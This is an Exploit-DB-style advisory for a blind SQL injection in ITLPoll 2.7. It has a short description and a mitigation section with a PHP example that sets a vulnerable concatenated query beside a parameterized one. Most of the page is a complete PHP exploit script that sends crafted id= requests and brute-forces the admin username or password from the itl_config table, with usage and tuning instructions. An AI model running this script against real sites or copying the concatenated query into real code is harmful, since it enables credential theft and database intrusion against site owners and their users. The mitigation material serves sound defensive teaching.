Vendor: ITLPoll
By: milw0rm.com
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: ITLPoll
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ITLPoll v2.7 Stable2 Blind SQL Injection Exploit

ITLPoll v2.7 Stable2 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. This exploit uses a brute-force approach to extract the username and password from the database.

Mitigation:

The best way to mitigate SQL injection is to use parameterized queries (prepared statements). These ensure that user input is treated as a literal value rather than as part of the query text, so the boolean oracle this exploit relies on never arises.
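To make the mitigation concrete, here is an added example (not ITLPoll's own code): a hypothetical poll lookup written in the vulnerable concatenation style beside the parameterized version. The table name itl_poll, its columns, and the PDO/SQLite setup are assumptions constructed for the demo.

```php
<?php
// Added example, not ITLPoll's code. Hypothetical poll lookup on ?id=,
// shown vulnerable and then hardened. Assumes a PDO handle and a table
// itl_poll(id, title, expires); both are constructed below for the demo.

// VULNERABLE (hypothetical): the raw id is spliced into the SQL string,
// so an input such as 1' AND ... ='65 becomes part of the WHERE clause and
// the visible "expired" / "not expired" difference turns into a boolean oracle.
function findPollVulnerable(PDO $pdo, string $id): ?array
{
    $sql = "SELECT id, title, expires FROM itl_poll WHERE id = '$id'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED: validate the type first, then pass the value as a bound
// parameter so it can never be parsed as SQL.
function findPollSafe(PDO $pdo, string $id): ?array
{
    if (!ctype_digit($id)) {   // poll ids are integers; anything else is rejected
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, title, expires FROM itl_poll WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration on an in-memory SQLite database with constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE itl_poll (id INTEGER PRIMARY KEY, title TEXT, expires TEXT)');
$pdo->exec("INSERT INTO itl_poll VALUES (1, 'Favourite colour?', '2010-01-01')");

$probe = "1' AND '1'='1";   // constructed true-branch input, same shape as the exploit's
var_dump(findPollVulnerable($pdo, $probe) !== null);   // bool(true): injected clause executed
var_dump(findPollSafe($pdo, $probe));                  // NULL: rejected before any query runs
var_dump(findPollSafe($pdo, '1')['title']);            // string(17) "Favourite colour?"
```

The vulnerable function returns a row for the probe only because the injected condition was evaluated by the database; the hardened function never lets the input reach the parser.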
Source

Exploit-DB raw data:

<?php

function usage ()
{
    echo "\nITLPoll v2.7 Stable2 Blind SQL Injection Exploit".
         "\n[☢] Usage   : ./itlpoll.php hostname path <username or password>".
         "\n[☢] Ex      : ./itlpoll.php localhost /itlpoll password".
         "\n\n";
    exit ();
}


function query ($func, $chr, $pos)
{   //replace 1' with a valid poll number if you have problems. See hostname/path/?Archive for a list of polls.
    $query = "1' AND ORD(MID((SELECT IFNULL(CAST({$func} AS CHAR(10000)), CHAR(32)) FROM itl_config WHERE id = 1),{$pos},1))='{$chr}";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
}

function exploit ($host, $path, $func, $pos, $chr)
{
    $chr = ord ($chr);
    $fp = fsockopen ($host, 80);
    $query = query ($func, $chr, $pos);
    $request = "GET {$path}/index.php?id={$query} HTTP/1.1\r\n".
               "Host: {$host}\r\n".
               "Connection: Close\r\n\r\n";

    fputs ($fp, $request);
    $reply = ""; // initialise before appending, otherwise PHP raises an undefined-variable notice
    while (!feof ($fp))
        $reply .= fgets ($fp, 1024);
    
    fclose ($fp);

    if (preg_match ("/EXPIERED/", $reply))
        return false;
    else
        return true;
}


if ($argc != 4)
    usage ();

$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; //add a bigger char set if you can't get the username
$pos = 1;
$chr = 0;

echo "[☢] Creds: ";

while ($pos <= 32)
{
    if (exploit ($host, $path, $func, $pos, $key [$chr]))
    {
        echo $key [$chr];
        $chr = 0;
        $pos++;
    }
    else
        $chr++;
}
echo "\n";
?>

# milw0rm.com [2009-01-26]